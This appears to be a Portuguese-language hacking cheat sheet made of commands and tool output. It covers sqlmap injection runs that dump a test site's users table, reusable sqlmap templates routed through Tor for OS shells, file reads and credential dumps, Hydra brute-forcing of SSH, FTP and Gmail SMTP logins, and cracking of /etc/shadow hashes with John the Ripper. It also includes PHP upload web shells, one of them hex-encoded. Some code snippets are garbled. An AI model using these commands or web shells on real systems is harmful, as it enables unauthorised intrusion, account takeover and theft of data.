[12:15:20] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' [12:15:21] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' [12:15:21] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' [12:15:21] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' [12:15:21] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)' [12:15:22] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)' [12:15:22] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)' [12:15:22] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)' [12:15:22] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)' [12:15:23] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)' [12:15:23] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' [12:15:23] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause' [12:15:23] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause' [12:15:24] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)' [12:15:24] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' [12:15:25] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)' [12:15:25] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)' [12:15:25] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)' [12:15:25] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)' [12:15:26] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' [12:15:26] [WARNING] time-based comparison requires larger statistical model, please wait. [12:15:26] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)' [12:15:26] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)' [12:15:27] [INFO] testing 'MySQL > 5.0.11 stacked queries' [12:15:27] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)' [12:15:27] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' [12:15:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [12:15:27] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [12:15:28] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test [12:15:29] [INFO] target URL appears to have 3 columns in query [12:15:31] [INFO] GET parameter 'artist' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable GET parameter 'artist' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n sqlmap identified the following injection point(s) with a total of 46 HTTP(s) requests: --- Parameter: artist (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: artist=1 AND 5619=5619 Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: artist=-8736 UNION ALL SELECT CONCAT(0x7170716a71, 0x4973546243766278496f444b6b44654762736b496c61444a6c68577a61714c68665071516f6b7469, 0x716b717871),NULL,NULL-- - --- [12:16:02] [INFO] testing MySQL [12:16:02] [INFO] confirming MySQL [12:16:03] [INFO] the back-end DBMS is MySQL web application technology: Nginx, PHP 5.3.10 back-end DBMS: MySQL >= 5.0.0 [12:16:03] [INFO] fetching database names [12:16:03] [INFO] the SQL query used returns 2 entries [12:16:03] [INFO] starting 2 threads [12:16:03] [INFO] retrieved: acuart [12:16:03] [INFO] retrieved: information_schema available databases [2]: [*] acuart [*] information_schema [12:16:03] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com' [*] shutting down at 12:16:03 ---------------------------------------------- *** Digite o comando abaixo em um única linha: sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --current-user --is-dba --current-db --hostname --time-sec=3 --threads=3 --technique=BEUS --random-agent --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" --tor-type=SOCKS5 --tor-port 9050 _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-201603300a89} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 12:29:55 [12:29:55] [INFO] fetched random HTTP User-Agent header from file '/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9' [12:29:55] [INFO] resuming back-end DBMS 'mysql' [12:29:55] [INFO] testing connection to the target URL [12:29:56] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS sqlmap resumed the following injection point(s) from stored session: --- Parameter: artist (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: artist=1 AND 5619=5619 Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: artist=-8736 UNION ALL SELECT CONCAT(0x7170716a71, 0x4973546243766278496f444b6b44654762736b496c61444a6c68577a61714c68665071516f6b7469, 0x716b717871),NULL,NULL-- - --- [12:29:56] [INFO] the back-end DBMS is MySQL web application technology: Nginx, PHP 5.3.10 back-end DBMS: MySQL 5 [12:29:56] [INFO] fetching current user current user: 'acuart@localhost' [12:29:56] [INFO] fetching current database current database: 'acuart' [12:29:56] [INFO] fetching server hostname hostname: 'rs202995' [12:29:57] [INFO] testing if current user is DBA [12:29:57] [INFO] fetching current user [12:29:57] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex' current user is DBA: False [12:29:57] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com' [*] shutting down at 12:29:57 ---------------------------------------------- Extraindo o conteúdo dos campos: Digite a linha abaixo em uma única linha: sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=2" -D acuart -T users -C uname,pass,cc,name --dump --time-sec=3 --threads=3 --technique=BEUS --random-agent --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" --tor-type=SOCKS5 --tor-port 9050 _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-201603300a89} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 13:33:01 [13:33:01] [INFO] fetched random HTTP User-Agent header from file '/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)' [13:33:02] [INFO] resuming back-end DBMS 'mysql' [13:33:02] [INFO] testing connection to the target URL [13:33:02] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS sqlmap resumed the following injection point(s) from stored session: --- Parameter: artist (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: artist=2 AND 4071=4071 Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: artist=-9556 UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7871, 0x554a4f78466953624f7376665a524e7a4c5867666476706566546a49634e6f545a76784d6c4a5745, 0x716b706a71)-- --- [13:33:02] [INFO] the back-end DBMS is MySQL web application technology: Nginx, PHP 5.3.10 back-end DBMS: MySQL 5.0.12 [13:33:02] [INFO] fetching entries of column(s) 'cc, name, pass, uname' for table 'users' in database 'acuart' [13:33:02] [INFO] the SQL query used returns 1 entries [13:33:02] [INFO] resumed: "1234-5678-2300-9000","teste","test","test" [13:33:02] [INFO] analyzing table dump for possible password hashes Database: acuart Table: users [1 entry] +-------+------+---------------------+-------+ | uname | pass | cc | name | +-------+------+---------------------+-------+ | test | test | 1234-5678-2300-9000 | teste | +-------+------+---------------------+-------+ [13:33:02] [INFO] table 'acuart.users' dumped to CSV file '/root/.sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv' [13:33:02] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com' [*] shutting down at 13:33:02
Digite a linha abaixo e uma única linha: proxychains sqlmap -u "vul_url" --dbs --time-sec=3 --threads=3 --technique=BEUS --random-agent --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" --tor-type=SOCKS5 --tor-port 9050 ---------------------------------------------- Digite a linha abaixo e uma única linha: proxychains sqlmap -u "vul_url" --dbs --time-sec=3 --threads=3 --technique=BEUS --random-agent --no-cast --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" --tor-type=SOCKS5 --tor-port 9050 ---------------------------------------------- Digite a linha abaixo e uma única linha: proxychains sqlmap -u "vul_url" --current-user --is-dba --current-db --hostname --time-sec=3 --threads=3 --technique=BEUS --random-agent --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" --tor-type=SOCKS5 --tor-port 9050 ---------------------------------------------- proxychains sqlmap -u "vul_url" --current-user --is-dba --current-db --hostname --time-sec=3 --threads=3 --technique=BEUS --random-agent --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" --tor-type=SOCKS5 --tor-port 9050 ---------------------------------------------- proxychains sqlmap -u "vul_url" --dbms=mysql -D data_base -T table --dump -C login,senha ---------------------------------------------- --level=3 --risk=3 --retries=3 --flush-session --hex --no-cast --batch --banner --current-user --is-dba --current-db --hostname --current-user --is-dba --parse-errors -v 3 ( show errors, messages ) --batch --tables --columns -T password --threads=8 --batch --dump -T password -C admin,pass --threads=8 --fresh-queries --batch --banner --current-user --current-db --users --current-db --dbs --exclude-sysdbs --tables --columns --flush-session —batch --level=3 --risk=3 --forms --batch --banner --flush-session --level=3 --risk=3 --forms --batch --banner --flush-session -p referer --level=3 --risk=3 --flush-session --technique=B --batch --level=3 --risk=3 --retries=3 --flush-session --hex --no-cast --batch --banner ---------------------------------------------- --technique=BEUST -s /tmp/scan_report.txt --flush-session -t /tmp/scan_trace.txt --fresh-queries > /root/scan_out.txt ---------------------------------------------- --data=‘cat payload’ prefix="1’,1;" --suffix="-" --dns-domain=acme.com --os-shell --fresh-queries --retries=5 --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" ---------------------------------------------- --dbms=mysql --level=3 --risk=3 --time-sec=3 --threads=3 --technique=BEUS --random-agent --no-cast --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" --tor-type=SOCKS5 --tor-port 9050 --tamper="between,randomcase,space2comment" --data "login#2*&senha=123#1*" --alert --crawl=CRAWLDEPTH --regexp --string --text-only --cookie "security=low; PHPSESSID=daa2374033f2a5fa6b57d9cc22692301" ---------------------------------------------- --batch --file-read="/etc/passwd” --batch --forms --flush-session --delay=5 --tech=T --hex --crawl=3 --sql-query "SELECT * FROM users” --sql-query="SELECT user,pass FROM usuarios WHERE user LIKE '%admin%’" --sql-query "UPDATE SET user ‘jura' WHERE username ‘aris' FROM databaseX.admin" -v 2 –-sql-query=”select * from transactions.sample_tran_table” --users --passwords --privileges --roles --threads=10 --forms --batch --crawl=10 --cookie=jsessionid=12345 --level=5 --risk=3 --dbms="Microsoft Access" -–dbms=”Microsoft SQL Server” --dbms="PostgreSQL" ---------------------------------------------- --data "username=login#2*&senha=123#1*" --dbms=mysql --alert --crawl=CRAWLDEPTH -level=5 --regexp --string --text-only ---------------------------------------------- --time-sec=7 --threads=3 --technique=BEUS --random-agent --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" --tor-type=SOCKS5 --tor-port 9050 *** #2* e #1* Indica que são campos posts e os mesmo devem ser injetados ---------------------------------------------- proxychains sqlmap -u "vul_url/index.php?page=login.php" --method "POST" --data "user_name=admin&password=adminpass&Submit_button=Submit" ---------------------------------------------- -D mysql --sql-query="select usuario, senha from mysql.usuarios order by usuario desc" -D mysql --sql-query="select column_name from information_schema.columns where table_name = 'usuarios'" ----------------------------------------------
Instalando Laboratório DVWA No Kali abra o navegador Firefox e a url -> www.dvwa.co.uk clique no botão "download", será baixado dentro da pasta "Downloads" o arquivo "DVWA-master.zip" cd Downloads unzip DVWA-master.zip mv DVWA-master /var/www/html/dvwa cd /var/www/html chmod -R 755 dvwa cd dvwa/config cp config.inc.php.dist config.inc.php ----------------------------- Altere algumas linhas abaixo... nano /var/www/html/dvwa/config/config.inc.php $DBMS = 'MySQL'; # Deixe as linhas abaixo como abaixo: $_DVWA = array(); $_DVWA[ 'db_server' ] = '127.0.0.1'; $_DVWA[ 'db_database' ] = 'dvwa'; $_DVWA[ 'db_user' ] = 'root'; $_DVWA[ 'db_password' ] = ''; $_DVWA[ 'recaptcha_public_key' ] = '6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT_yJg'; $_DVWA[ 'recaptcha_private_key' ] = '6LdK7xITAzzAAL_uw9YXVUOPoIHPZLfw2K1n5NVQ'; ----------------------------- mysql -u root -p create database dvwa; quit ----------------------------- chmod -R 777 /var/www/html/dvwa/hackable/uploads/ chmod -R 777 /var/www/html/dvwa/external/phpids/0.6/lib/IDS/tmp/phpids_log.txt ----------------------------- nano /etc/php/7.0/apache2/php.ini allow_url_include = on ----------------------------- service apache2 start service mysql start service mysql status service apache2 status ----------------------------- http://192.168.2.193/dvwa/setup.php User: admin Pass: password
Digite o ip do servidor ( kali ) e clique no botão "Submit"
----------------------------- File Inclusion http://192.168.2.193/dvwa/vulnerabilities/fi/?page=include.php http://192.168.2.193/dvwa/vulnerabilities/fi/?page=/etc/passwd
No terminal do Kali 2.0 digite os comandos abaixo: nmap -sS -sC -sV 192.168.2.193 Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-12 01:07 EDT Nmap scan report for 192.168.2.193 Host is up (0.0000020s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10 (protocol 2.0) | ssh-hostkey: | 2048 7d:a9:70:d3:55:c8:cc:6e:c4:ca:c9:c0:0b:bd:3a:a3 (RSA) |_ 256 dc:c1:af:2d:fc:d4:a6:6a:49:5e:4d:b8:d2:9a:d1:19 (ECDSA) 80/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Apache2 Debian Default Page: It works Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Example 1 hydra -l jura -P passlist.txt 192.168.2.193 ssh -v -V Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2017-05-12 01:01:33 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 6 tasks per 1 server, overall 64 tasks, 6 login tries (l:1/p:6), ~0 tries per task [DATA] attacking service ssh on port 22 [VERBOSE] Resolving addresses ... [VERBOSE] resolving done [INFO] Testing if password authentication is supported by ssh://192.168.2.193:22 [INFO] Successful, password authentication is supported by ssh://192.168.2.193:22 [ATTEMPT] target 192.168.2.193 - login "jura" - pass "123" - 1 of 6 [child 0] (0/0) [ATTEMPT] target 192.168.2.193 - login "jura" - pass "jura" - 2 of 6 [child 1] (0/0) [ATTEMPT] target 192.168.2.193 - login "jura" - pass "eu" - 3 of 6 [child 2] (0/0) [ATTEMPT] target 192.168.2.193 - login "jura" - pass "pizza" - 4 of 6 [child 3] (0/0) [ATTEMPT] target 192.168.2.193 - login "jura" - pass "test" - 5 of 6 [child 4] (0/0) [ATTEMPT] target 192.168.2.193 - login "jura" - pass "teste" - 6 of 6 [child 5] (0/0) [22][ssh] host: 192.168.2.193 login: jura password: 123 [STATUS] attack finished for 192.168.2.193 (waiting for children to complete tests) 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2017-05-12 01:01:35 Vamos criar um arquivo com algumas senhas. cat > passlist.txt 123 jura eu pizza test teste admin winner ctrl + d ( salvar e sair ) Example 2 hydra 192.168.2.13 ftp -s 50000 -L /root/users.txt -P /root/passlist.txt Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2017-05-12 02:01:01 [WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort... [DATA] max 16 tasks per 1 server, overall 64 tasks, 42 login tries (l:7/p:6), ~0 tries per task [DATA] attacking service ftp on port 50000 [50000][ftp] host: 192.168.2.13 login: ewb1 password: 123 [50000][ftp] host: 192.168.2.13 login: ftp1 password: 123 1 of 1 target successfully completed, 2 valid passwords found Hydra (http://www.thc.org/thc-hydra) finished at 2017-05-12 02:01:16 Criando um arquivo usuários. cat > users.txt root admin administrator ewb ewb1 ftp ftp1 ctrl + d ( salvar e sair ) cat > passlist.txt 123 jura eu pizza test teste ctrl + d ( salvar e sair ) Outra forma seria usarmos o arquivo um dicionário de senhas do Kali -> rockyou No terminal do Kali vamos procurar o arquivo. locate *rockyou* Descompacte-o. gunzip /usr/share/wordlists/rockyou.txt.gz Mova o arquivo para o diretório root. mv /usr/share/wordlists/rockyou.txt /root/rockyou.txt Listando arquivo. ls -lh -rw-r--r-- 1 root root 134M Mar 3 2013 rockyou.txt Or ... download wordlist mkdir -p /usr/share/wordlists/ git clone https://github.com/danielmiessler/SecLists/ /usr/share/wordlists/ cd /usr/share/wordlists/Passwords/Leaked-Databases/ tar -xvzf rockyou-withcount.txt.tar.gz tar -xvzf rockyou.txt.tar.gz ls -lhS rock* 1 jura jura 243M Sep 23 2015 rockyou-withcount.txt 1 jura jura 134M Sep 23 2015 rockyou.txt -rw-r--r-- 1 root root 54M Nov 30 15:20 rockyou-withcount.txt.tar.gz -rw-r--r-- 1 root root 51M Nov 30 15:20 rockyou.txt.tar.gz -rw-r--r-- 1 root root 468K Nov 30 15:20 rockyou-75.txt -rw-r--r-- 1 root root 337K Nov 30 15:20 rockyou-70.txt -rw-r--r-- 1 root root 239K Nov 30 15:20 rockyou-65.txt -rw-r--r-- 1 root root 167K Nov 30 15:20 rockyou-60.txt -rw-r--r-- 1 root root 113K Nov 30 15:20 rockyou-55.txt -rw-r--r-- 1 root root 75K Nov 30 15:20 rockyou-50.txt -rw-r--r-- 1 root root 48K Nov 30 15:20 rockyou-45.txt -rw-r--r-- 1 root root 31K Nov 30 15:20 rockyou-40.txt -rw-r--r-- 1 root root 20K Nov 30 15:20 rockyou-35.txt -rw-r--r-- 1 root root 12K Nov 30 15:20 rockyou-30.txt -rw-r--r-- 1 root root 7.1K Nov 30 15:20 rockyou-25.txt -rw-r--r-- 1 root root 4.0K Nov 30 15:20 rockyou-20.txt -rw-r--r-- 1 root root 1.9K Nov 30 15:20 rockyou-15.txt -rw-r--r-- 1 root root 723 Nov 30 15:20 rockyou-10.txt -rw-r--r-- 1 root root 104 Nov 30 15:20 rockyou-05.txt rm *.tar.gz du -sch /usr/share/wordlists/Passwords/ 282M /usr/share/wordlists/Passwords/ 282M total hydra -l jura -p /usr/share/wordlists/Passwords/Leaked-Databases/rockyou-withcount.txt 192.168.10.108 -t 4 ssh hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.105 -t 4 -e nsr ssh hydra -l root -P /usr/share/wordlists/Passwords/Leaked-Databases/rockyou-withcount.txt 192.168.1.105 -t 4 -e nsr ssh Usando o dicionário. hydra 192.168.2.13 ftp -s 50000 -L /root/users.txt -P /root/rockyou.txt Example 3 hydra -l root -P passlist.txt 192.168.2.13 ssh Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2017-05-12 02:11:45 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort... [DATA] max 6 tasks per 1 server, overall 64 tasks, 6 login tries (l:1/p:6), ~0 tries per task [DATA] attacking service ssh on port 22 [22][ssh] host: 192.168.2.13 login: root password: 123 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2017-05-12 02:11:58 Example 4 Brute force em um email do google. hydra -S -l emailx@gmail.com -P /usr/share/wordlists/nmap.lst -e ns -V -s 465 smtp.gmail.com smtp hydra -S -l 2helpmeout@gmail.com -P /root/users.txt -P /root/rockyou.txt -e ns -V -s 465 smtp.gmail.com smtp hydra -t 5 -V -f -l jura -P passlist.txt localhost ssh hydra -t 5 -V -f -l root -e ns -P passlist.txt localhost mysql
No terminal do Kali 2.0 digite os comandos abaixo: unshadow /etc/shadow /etc/passwd >> mypasswd.txt cat mypasswd.txt root:$6$MH8TLS/Q$C3Vtt7RaOIcWXLcnva71/RPoj9TJ6g42xgCG0HqpJMPrkIAAKSLKjo2MRNgu3/wPiIaXg/PFB9w9gPq/mQhXC.:0:0:root:/root:/bin/bash daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:*:2:2:bin:/bin:/usr/sbin/nologin sys:*:3:3:sys:/dev:/usr/sbin/nologin sync:*:4:65534:sync:/bin:/bin/sync games:*:5:60:games:/usr/games:/usr/sbin/nologin man:*:6:12:man:/var/cache/man:/usr/sbin/nologin lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:*:8:8:mail:/var/mail:/usr/sbin/nologin news:*:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:*:13:13:proxy:/bin:/usr/sbin/nologin www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin backup:*:34:34:backup:/var/backups:/usr/sbin/nologin list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:*:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:*:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:*:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:*:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:*:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false _apt:*:104:65534::/nonexistent:/bin/false mysql:!:105:109:MySQL Server,,,:/nonexistent:/bin/false epmd:*:106:110::/var/run/epmd:/bin/false Debian-exim:!:107:111::/var/spool/exim4:/bin/false uuidd:*:108:113::/run/uuidd:/bin/false rwhod:*:109:65534::/var/spool/rwho:/bin/false iodine:*:110:65534::/var/run/iodine:/bin/false miredo:*:111:65534::/var/run/miredo:/bin/false ntp:*:112:114::/home/ntp:/bin/false stunnel4:!:113:116::/var/run/stunnel4:/bin/false redsocks:!:114:117::/var/run/redsocks:/bin/false rtkit:*:115:118:RealtimeKit,,,:/proc:/bin/false postgres:*:116:119:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash dnsmasq:*:117:65534:dnsmasq,,,:/var/lib/misc:/bin/false messagebus:*:118:120::/var/run/dbus:/bin/false arpwatch:!:119:122:ARP Watcher,,,:/var/lib/arpwatch:/bin/sh usbmux:*:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false sslh:!:122:126::/nonexistent:/bin/false geoclue:*:123:128::/var/lib/geoclue:/bin/false couchdb:*:124:129:CouchDB Administrator,,,:/var/lib/couchdb:/bin/bash avahi:*:125:131:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false sshd:*:126:65534::/var/run/sshd:/usr/sbin/nologin colord:*:127:132:colord colour management daemon,,,:/var/lib/colord:/bin/false saned:*:128:134::/var/lib/saned:/bin/false speech-dispatcher:!:129:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false pulse:*:130:135:PulseAudio daemon,,,:/var/run/pulse:/bin/false king-phisher:*:131:137::/var/lib/king-phisher:/bin/false Debian-gdm:*:132:139:Gnome Display Manager:/var/lib/gdm3:/bin/false dradis:*:133:140::/var/lib/dradis:/bin/false beef-xss:*:134:141::/var/lib/beef-xss:/bin/false jura:$6$Kxd.KdHp$VioUe6iuTfhFLUp0cC.2LcN5pQ0wqdQ44YPL.3fefmvY2IyVA2yCAGgui/.IouHIX2CuR873KeKXJsMNaWI7v/:1000:1000:,,,:/home/jura:/bin/bash privoxy:*:121:65534::/etc/privoxy:/bin/false debian-tor:*:135:125::/var/lib/tor:/bin/false Debian-snmp:!:136:142::/var/lib/snmp:/bin/false /usr/sbin/john --wordlist=passlist.txt --rules mypasswd.txt Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt" Use the "--format=crypt" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE2 2x]) Press 'q' or Ctrl-C to abort, almost any other key for status 123 (root) 123 (jura) 2g 0:00:00:00 DONE (2017-05-12 02:33) 6.666g/s 213.3p/s 426.6c/s 426.6C/s 123..jura4 Use the "--show" option to display all of the cracked passwords reliably Session completed /usr/sbin/john --show mypasswd.txt root:123:0:0:root:/root:/bin/bash jura:123:1000:1000:,,,:/home/jura:/bin/bash 2 password hashes cracked, 0 left
Decriptografando senhas "fracas" - Decrypting weak passwords. The longer and the more characters mixed in the password the most difficult will be to decrypt it. http://www.hashkiller.co.uk/md5-decrypter.aspx Site para decriptografar hashes / senhas: 202cb962ac59075b964b07152d234b70
Uploader 1
<?php
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
else { echo '<b>Upload !!!</b><br><br>'; }
}
?>
Uploader 2
<html>
<body><?phpif(!empty($_FILES["file"]["name"])){move_uploaded_file($_FILES["file"]["tmp_name"],$_FILES["file"]["name"]);}?>
<form action="#" method="post"enctype="multipart/form-data"><label for="file">Filename:</label><input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="Submit"></form></body>
</html>
Uploader 3 - Hexed 0x3c68746d6c3e3c626f64793e3c3f70687069662821656d70747928245f46494c45535b2266696c65225 d5b226e616d65225d29297b6d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c 65225d5b22746d705f6e616d65225d2c245f46494c45535b2266696c65225d5b226e616d65225d293b7d3 f3e3c666f726d20616374696f6e3d222322206d6574686f643d22706f737422656e63747970653d226d75 6c7469706172742f666f726d2d64617461223e3c6c6162656c20666f723d2266696c65223e46696c656e6 16d653a3c2f6c6162656c3e3c696e70757420747970653d2266696c6522206e616d653d2266696c652220 69643d2266696c65223e3c62723e3c696e70757420747970653d227375626d697422206e616d653d22737 5626d6974222076616c75653d225375626d6974223e3c2f666f726d3e3c2f626f64793e3c2f68746d6c3e
dirb http://www.site.com.br
nikto -h www.site.com.br -p 80,88,443
uniscan -u http://site.com.br/ -qd
Compiling exploit in Kali gcc -m32 -o output32 hello.c ( 32 bit) gcc -m64 -o output hello.c ( 64 bit) More information. http://www.tutorialspoint.com/cplusplus/ http://www.cprogramming.com/tutorial/lesson1.html http://www3.ntu.edu.sg/home/ehchua/programming/cpp/cp1_Basics.html Criating a simple c file. cat > hi.c #includeint main() { system("color 09"); a:printf("Hello Friend, How You? \n"); { goto a; } getch(); } Compiling. gcc hi.c -o hello2 chmod 777 hello2 Running. ./hello
cat > hello.pl #!usr/bin/perl print "Enter your name: "; $name=; print "Hello, ${name} ... you will soon be a Perl addict!"; Running perl hello.pl
Example 1 cat > p1.py #!/usr/bin/python print "Hello World!" print "This is fun." Running. python exe1.py Example 2 cat > p2.py #!/usr/bin/python name = raw_input('What is your name?\n') print 'Hi, %s.' % name Running. python exe2.py
